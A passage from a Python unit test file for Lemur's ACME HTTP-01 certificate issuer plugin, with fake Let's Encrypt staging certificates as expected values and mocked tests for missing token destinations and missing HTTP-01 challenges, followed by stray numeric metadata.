DQVDVVGtqZPHwX3KqUtefE621b8RI6VCl4oD30Olf8pjuzG4JKBFRFclzLRjo/h7
IkkfjZ8wDa7faOjVXx6n+eUQ29cIMCzr8/rNWHS9pYGGQKJiY2xmVC9h12H99Xyf
zWE9vb5zKP3MVG6neX1hSdo7PEAb9fqRhHkqVsqUvJlIRmvXvVKTwNCP3eCjRCCI
PTAvjV+4ni786iXwwFYNz8l3PmPLCyQXWGohnJ8iBm+5nk7O2ynaPVW0U2W+pt2w
SVuvdDM5zGv2f9ltNWUiYZHJ1mmO97jSY/6YfdOUH66iRtQtDkHBRdkNBsMbD+Em
2TgBldtHNSJBfB3pm9FblgOcJ0FSWcUDWJ7vO0+NTXlgrRofRT6pVywzxVo6dND0
WzYlTWeUVsO40xJqhgUQRER9YLOLxJ0O6C8i0xFxAMKOtSdodMB3RIwt7RFQ0uyt
n5Z5MqkYhlMI3J1tPRTp1nEt9fyGspBOO05gi148Qasp+3N+svqKomoQglNoAxU=
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIFATCCAumgAwIBAgIRAKc9ZKBASymy5TLOEp57N98wDQYJKoZIhvcNAQELBQAw
GjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDMyMzIyNTM0NloXDTM2
MDMyMzIyNTM0NlowGjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMIICIjANBgkq
hkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA+pYHvQw5iU3v2b3iNuYNKYgsWD6KU7aJ
diddtZQxSWYzUI3U0I1UsRPTxnhTifs/M9NW4ZlV13ZfB7APwC8oqKOIiwo7IwlP
xg0VKgyz+kT8RJfYr66PPIYP0fpTeu42LpMJ+CKo9sbpgVNDZN2z/qiXrRNX/VtG
TkPV7a44fZ5bHHVruAxvDnylpQxJobtCBWlJSsbIRGFHMc2z88eUz9NmIOWUKGGj
EmP76x8OfRHpIpuxRSCjn0+i9+hR2siIOpcMOGd+40uVJxbRRP5ZXnUFa2fF5FWd
O0u0RPI8HON0ovhrwPJY+4eWKkQzyC611oLPYGQ4EbifRsTsCxUZqyUuStGyp8oa
aoSKfF6X0+KzGgwwnrjRTUpIl19A92KR0Noo6h622OX+4sZiO/JQdkuX5w/HupK0
A0M0WSMCvU6GOhjGotmh2VTEJwHHY4+TUk0iQYRtv1crONklyZoAQPD76hCrC8Cr
IbgsZLfTMC8TWUoMbyUDgvgYkHKMoPm0VGVVuwpRKJxv7+2wXO+pivrrUl2Q9fPe
Kk055nJLMV9yPUdig8othUKrRfSxli946AEV1eEOhxddfEwBE3Lt2xn0hhiIedbb
Ftf/5kEWFZkXyUmMJK8Ra76Kus2ABueUVEcZ48hrRr1Hf1N9n59VbTUaXgeiZA50
qXf2bymE6F8CAwEAAaNCMEAwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMB
Af8wHQYDVR0OBBYEFMEmdKSKRKDm+iAo2FwjmkWIGHngMA0GCSqGSIb3DQEBCwUA
A4ICAQBCPw74M9X/Xx04K1VAES3ypgQYH5bf9FXVDrwhRFSVckria/7dMzoF5wln
uq9NGsjkkkDg17AohcQdr8alH4LvPdxpKr3BjpvEcmbqF8xH+MbbeUEnmbSfLI8H
sefuhXF9AF/9iYvpVNC8FmJ0OhiVv13VgMQw0CRKkbtjZBf8xaEhq/YqxWVsgOjm
dm5CAQ2X0aX7502x8wYRgMnZhA5goC1zVWBVAi8yhhmlhhoDUfg17cXkmaJC5pDd
oenZ9NVhW8eDb03MFCrWNvIh89DDeCGWuWfDltDq0n3owyL0IeSn7RfpSclpxVmV
/53jkYjwIgxIG7Gsv0LKMbsf6QdBcTjhvfZyMIpBRkTe3zuHd2feKzY9lEkbRvRQ
zbh4Ps5YBnG6CKJPTbe2hfi3nhnw/MyEmF3zb0hzvLWNrR9XW3ibb2oL3424XOwc
VjrTSCLzO9Rv6s5wi03qoWvKAQQAElqTYRHhynJ3w6wuvKYF5zcZF3MDnrVGLbh1
Q9ePRFBCiXOQ6wPLoUhrrbZ8LpFUFYDXHMtYM7P9sc9IAWoONXREJaO08zgFtMp4
8iyIYUyQAbsvx8oD2M8kRvrIRSrRJSl6L957b4AFiLIQ/GgV2curs0jje7Edx34c
idWw1VrejtwclobqNMVtG3EiPUIpJGpbMcJgbiLSmKkrvQtGng==
-----END CERTIFICATE-----
"""
mock_finalized_order.alternative_fullchains_pem = [mock_finalized_order.fullchain_pem]
mock_finalized_order.authorizations = [Mock()]
mock_client.finalize_order.return_value = mock_finalized_order
mock_acme.return_value = (mock_client, "")
mock_destination = Mock()
mock_destination.label = "mock-sftp-destination"
mock_destination.plugin_name = "SFTPDestinationPlugin"
mock_destination_service.get.return_value = mock_destination
mock_destination_plugin = Mock()
mock_destination_plugin.upload_acme_token.return_value = True
mock_plugin_manager_get.return_value = mock_destination_plugin
issuer_options = {
"authority": mock_authority,
"tokenDestination": "mock-sftp-destination",
"common_name": "test.netflix.net",
}
csr = "123"
mock_request_certificate.return_value = ("pem_certificate", "chain")
pem_certificate, pem_certificate_chain, _ = provider.create_certificate(csr, issuer_options)
self.assertEqual(pem_certificate, "-----BEGIN CERTIFICATE-----\nMIIEqzCCApOgAwIBAgIRAIvhKg5ZRO08VGQx8JdhT+UwDQYJKoZIhvcNAQELBQAw\nGjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDUyMzIyMDc1OVoXDTM2\nMDUyMzIyMDc1OVowIjEgMB4GA1UEAwwXRmFrZSBMRSBJbnRlcm1lZGlhdGUgWDEw\nggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtWKySDn7rWZc5ggjz3ZB0\n8jO4xti3uzINfD5sQ7Lj7hzetUT+wQob+iXSZkhnvx+IvdbXF5/yt8aWPpUKnPym\noLxsYiI5gQBLxNDzIec0OIaflWqAr29m7J8+NNtApEN8nZFnf3bhehZW7AxmS1m0\nZnSsdHw0Fw+bgixPg2MQ9k9oefFeqa+7Kqdlz5bbrUYV2volxhDFtnI4Mh8BiWCN\nxDH1Hizq+GKCcHsinDZWurCqder/afJBnQs+SBSL6MVApHt+d35zjBD92fO2Je56\ndhMfzCgOKXeJ340WhW3TjD1zqLZXeaCyUNRnfOmWZV8nEhtHOFbUCU7r/KkjMZO9\nAgMBAAGjgeMwgeAwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQAw\nHQYDVR0OBBYEFMDMA0a5WCDMXHJw8+EuyyCm9Wg6MHoGCCsGAQUFBwEBBG4wbDA0\nBggrBgEFBQcwAYYoaHR0cDovL29jc3Auc3RnLXJvb3QteDEubGV0c2VuY3J5cHQu\nb3JnLzA0BggrBgEFBQcwAoYoaHR0cDovL2NlcnQuc3RnLXJvb3QteDEubGV0c2Vu\nY3J5cHQub3JnLzAfBgNVHSMEGDAWgBTBJnSkikSg5vogKNhcI5pFiBh54DANBgkq\nhkiG9w0BAQsFAAOCAgEABYSu4Il+fI0MYU42OTmEj+1HqQ5DvyAeyCA6sGuZdwjF\nUGeVOv3NnLyfofuUOjEbY5irFCDtnv+0ckukUZN9lz4Q2YjWGUpW4TTu3ieTsaC9\nAFvCSgNHJyWSVtWvB5XDxsqawl1KzHzzwr132bF2rtGtazSqVqK9E07sGHMCf+zp\nDQVDVVGtqZPHwX3KqUtefE621b8RI6VCl4oD30Olf8pjuzG4JKBFRFclzLRjo/h7\nIkkfjZ8wDa7faOjVXx6n+eUQ29cIMCzr8/rNWHS9pYGGQKJiY2xmVC9h12H99Xyf\nzWE9vb5zKP3MVG6neX1hSdo7PEAb9fqRhHkqVsqUvJlIRmvXvVKTwNCP3eCjRCCI\nPTAvjV+4ni786iXwwFYNz8l3PmPLCyQXWGohnJ8iBm+5nk7O2ynaPVW0U2W+pt2w\nSVuvdDM5zGv2f9ltNWUiYZHJ1mmO97jSY/6YfdOUH66iRtQtDkHBRdkNBsMbD+Em\n2TgBldtHNSJBfB3pm9FblgOcJ0FSWcUDWJ7vO0+NTXlgrRofRT6pVywzxVo6dND0\nWzYlTWeUVsO40xJqhgUQRER9YLOLxJ0O6C8i0xFxAMKOtSdodMB3RIwt7RFQ0uyt\nn5Z5MqkYhlMI3J1tPRTp1nEt9fyGspBOO05gi148Qasp+3N+svqKomoQglNoAxU=\n-----END CERTIFICATE-----\n")
self.assertEqual(pem_certificate_chain, """-----BEGIN CERTIFICATE-----
MIIEqzCCApOgAwIBAgIRAIvhKg5ZRO08VGQx8JdhT+UwDQYJKoZIhvcNAQELBQAw
GjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDUyMzIyMDc1OVoXDTM2
MDUyMzIyMDc1OVowIjEgMB4GA1UEAwwXRmFrZSBMRSBJbnRlcm1lZGlhdGUgWDEw
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtWKySDn7rWZc5ggjz3ZB0
8jO4xti3uzINfD5sQ7Lj7hzetUT+wQob+iXSZkhnvx+IvdbXF5/yt8aWPpUKnPym
oLxsYiI5gQBLxNDzIec0OIaflWqAr29m7J8+NNtApEN8nZFnf3bhehZW7AxmS1m0
ZnSsdHw0Fw+bgixPg2MQ9k9oefFeqa+7Kqdlz5bbrUYV2volxhDFtnI4Mh8BiWCN
xDH1Hizq+GKCcHsinDZWurCqder/afJBnQs+SBSL6MVApHt+d35zjBD92fO2Je56
dhMfzCgOKXeJ340WhW3TjD1zqLZXeaCyUNRnfOmWZV8nEhtHOFbUCU7r/KkjMZO9
AgMBAAGjgeMwgeAwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQAw
HQYDVR0OBBYEFMDMA0a5WCDMXHJw8+EuyyCm9Wg6MHoGCCsGAQUFBwEBBG4wbDA0
BggrBgEFBQcwAYYoaHR0cDovL29jc3Auc3RnLXJvb3QteDEubGV0c2VuY3J5cHQu
b3JnLzA0BggrBgEFBQcwAoYoaHR0cDovL2NlcnQuc3RnLXJvb3QteDEubGV0c2Vu
Y3J5cHQub3JnLzAfBgNVHSMEGDAWgBTBJnSkikSg5vogKNhcI5pFiBh54DANBgkq
hkiG9w0BAQsFAAOCAgEABYSu4Il+fI0MYU42OTmEj+1HqQ5DvyAeyCA6sGuZdwjF
UGeVOv3NnLyfofuUOjEbY5irFCDtnv+0ckukUZN9lz4Q2YjWGUpW4TTu3ieTsaC9
AFvCSgNHJyWSVtWvB5XDxsqawl1KzHzzwr132bF2rtGtazSqVqK9E07sGHMCf+zp
DQVDVVGtqZPHwX3KqUtefE621b8RI6VCl4oD30Olf8pjuzG4JKBFRFclzLRjo/h7
IkkfjZ8wDa7faOjVXx6n+eUQ29cIMCzr8/rNWHS9pYGGQKJiY2xmVC9h12H99Xyf
zWE9vb5zKP3MVG6neX1hSdo7PEAb9fqRhHkqVsqUvJlIRmvXvVKTwNCP3eCjRCCI
PTAvjV+4ni786iXwwFYNz8l3PmPLCyQXWGohnJ8iBm+5nk7O2ynaPVW0U2W+pt2w
SVuvdDM5zGv2f9ltNWUiYZHJ1mmO97jSY/6YfdOUH66iRtQtDkHBRdkNBsMbD+Em
2TgBldtHNSJBfB3pm9FblgOcJ0FSWcUDWJ7vO0+NTXlgrRofRT6pVywzxVo6dND0
WzYlTWeUVsO40xJqhgUQRER9YLOLxJ0O6C8i0xFxAMKOtSdodMB3RIwt7RFQ0uyt
n5Z5MqkYhlMI3J1tPRTp1nEt9fyGspBOO05gi148Qasp+3N+svqKomoQglNoAxU=
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIFATCCAumgAwIBAgIRAKc9ZKBASymy5TLOEp57N98wDQYJKoZIhvcNAQELBQAw
GjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDMyMzIyNTM0NloXDTM2
MDMyMzIyNTM0NlowGjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMIICIjANBgkq
hkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA+pYHvQw5iU3v2b3iNuYNKYgsWD6KU7aJ
diddtZQxSWYzUI3U0I1UsRPTxnhTifs/M9NW4ZlV13ZfB7APwC8oqKOIiwo7IwlP
xg0VKgyz+kT8RJfYr66PPIYP0fpTeu42LpMJ+CKo9sbpgVNDZN2z/qiXrRNX/VtG
TkPV7a44fZ5bHHVruAxvDnylpQxJobtCBWlJSsbIRGFHMc2z88eUz9NmIOWUKGGj
EmP76x8OfRHpIpuxRSCjn0+i9+hR2siIOpcMOGd+40uVJxbRRP5ZXnUFa2fF5FWd
O0u0RPI8HON0ovhrwPJY+4eWKkQzyC611oLPYGQ4EbifRsTsCxUZqyUuStGyp8oa
aoSKfF6X0+KzGgwwnrjRTUpIl19A92KR0Noo6h622OX+4sZiO/JQdkuX5w/HupK0
A0M0WSMCvU6GOhjGotmh2VTEJwHHY4+TUk0iQYRtv1crONklyZoAQPD76hCrC8Cr
IbgsZLfTMC8TWUoMbyUDgvgYkHKMoPm0VGVVuwpRKJxv7+2wXO+pivrrUl2Q9fPe
Kk055nJLMV9yPUdig8othUKrRfSxli946AEV1eEOhxddfEwBE3Lt2xn0hhiIedbb
Ftf/5kEWFZkXyUmMJK8Ra76Kus2ABueUVEcZ48hrRr1Hf1N9n59VbTUaXgeiZA50
qXf2bymE6F8CAwEAAaNCMEAwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMB
Af8wHQYDVR0OBBYEFMEmdKSKRKDm+iAo2FwjmkWIGHngMA0GCSqGSIb3DQEBCwUA
A4ICAQBCPw74M9X/Xx04K1VAES3ypgQYH5bf9FXVDrwhRFSVckria/7dMzoF5wln
uq9NGsjkkkDg17AohcQdr8alH4LvPdxpKr3BjpvEcmbqF8xH+MbbeUEnmbSfLI8H
sefuhXF9AF/9iYvpVNC8FmJ0OhiVv13VgMQw0CRKkbtjZBf8xaEhq/YqxWVsgOjm
dm5CAQ2X0aX7502x8wYRgMnZhA5goC1zVWBVAi8yhhmlhhoDUfg17cXkmaJC5pDd
oenZ9NVhW8eDb03MFCrWNvIh89DDeCGWuWfDltDq0n3owyL0IeSn7RfpSclpxVmV
/53jkYjwIgxIG7Gsv0LKMbsf6QdBcTjhvfZyMIpBRkTe3zuHd2feKzY9lEkbRvRQ
zbh4Ps5YBnG6CKJPTbe2hfi3nhnw/MyEmF3zb0hzvLWNrR9XW3ibb2oL3424XOwc
VjrTSCLzO9Rv6s5wi03qoWvKAQQAElqTYRHhynJ3w6wuvKYF5zcZF3MDnrVGLbh1
Q9ePRFBCiXOQ6wPLoUhrrbZ8LpFUFYDXHMtYM7P9sc9IAWoONXREJaO08zgFtMp4
8iyIYUyQAbsvx8oD2M8kRvrIRSrRJSl6L957b4AFiLIQ/GgV2curs0jje7Edx34c
idWw1VrejtwclobqNMVtG3EiPUIpJGpbMcJgbiLSmKkrvQtGng==
-----END CERTIFICATE-----
""")
@patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.setup_acme_client")
@patch("lemur.plugins.base.manager.PluginManager.get")
@patch("lemur.plugins.lemur_acme.challenge_types.destination_service")
@patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.request_certificate")
@patch("lemur.plugins.lemur_acme.plugin.authorization_service")
def test_create_certificate_missing_destination_token(
self,
mock_authorization_service,
mock_request_certificate,
mock_destination_service,
mock_plugin_manager_get,
mock_acme,
):
provider = plugin.ACMEHttpIssuerPlugin()
mock_authority = Mock()
mock_authority.options = '[{"name": "mock_name", "value": "mock_value"}]'
mock_order_resource = Mock()
mock_order_resource.authorizations = [Mock()]
mock_order_resource.authorizations[0].body.challenges = [Mock()]
mock_order_resource.authorizations[0].body.challenges[0].chall = challenges.HTTP01(
token=b'\x0f\x1c\xbe#od\xd1\x9c\xa6j\\\xa4\r\xed\xe5\xbf0pz\xeaxnl)\xea[i\xbc\x95\x08\x96\x1f')
mock_client = Mock()
mock_client.new_order.return_value = mock_order_resource
mock_acme.return_value = (mock_client, "")
mock_destination = Mock()
mock_destination.label = "mock-sftp-destination"
mock_destination.plugin_name = "SFTPDestinationPlugin"
mock_destination_service.get_by_label.return_value = mock_destination
mock_destination_plugin = Mock()
mock_destination_plugin.upload_acme_token.return_value = True
mock_plugin_manager_get.return_value = mock_destination_plugin
issuer_options = {
"authority": mock_authority,
"tokenDestination": "mock-sftp-destination",
"common_name": "test.netflix.net",
}
csr = "123"
mock_request_certificate.return_value = ("pem_certificate", "chain")
with self.assertRaisesRegex(Exception, "No token_destination configured"):
provider.create_certificate(csr, issuer_options)
@patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.setup_acme_client")
@patch("lemur.plugins.base.manager.PluginManager.get")
@patch("lemur.plugins.lemur_acme.challenge_types.destination_service")
@patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.request_certificate")
@patch("lemur.plugins.lemur_acme.plugin.authorization_service")
def test_create_certificate_missing_http_challenge(
self,
mock_authorization_service,
mock_request_certificate,
mock_destination_service,
mock_plugin_manager_get,
mock_acme,
):
provider = plugin.ACMEHttpIssuerPlugin()
mock_authority = Mock()
mock_authority.options = '[{"name": "tokenDestination", "value": "mock-sftp-destination"}]'
mock_order_resource = Mock()
mock_order_resource.authorizations = [Mock()]
mock_order_resource.authorizations[0].body.challenges = [Mock()]
mock_order_resource.authorizations[0].body.challenges[0].chall = challenges.DNS01(
token=b'\x0f\x1c\xbe#od\xd1\x9c\xa6j\\\xa4\r\xed\xe5\xbf0pz\xeaxnl)\xea[i\xbc\x95\x08\x96\x1f')
mock_client = Mock()
mock_client.new_order.return_value = mock_order_resource
mock_acme.return_value = (mock_client, "")
issuer_options = {
"authority": mock_authority,
"tokenDestination": "mock-sftp-destination",
"common_name": "test.netflix.net",
}
csr = "123"
mock_request_certificate.return_value = ("pem_certificate", "chain")
with self.assertRaisesRegex(Exception, "HTTP-01 challenge was not offered"):
provider.create_certificate(csr, issuer_options)
| 57.320635
| 1,751
| 0.837838
| 1,209
| 18,056
| 12.304384
| 0.232423
| 0.011293
| 0.018284
| 0.018352
| 0.81003
| 0.80566
| 0.797392
| 0.797392
| 0.797392
| 0.797392
| 0
| 0.089125
| 0.097087
| 18,056
| 314
| 1,752
| 57.503185
| 0.823345
| 0.01152
| 0
| 0.828671
| 0
| 0.013986
| 0.682376
| 0.627795
| 0
| 1
| 0
| 0
| 0.027972
| 1
| 0.020979
| false
| 0.003497
| 0.017483
| 0
| 0.041958
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.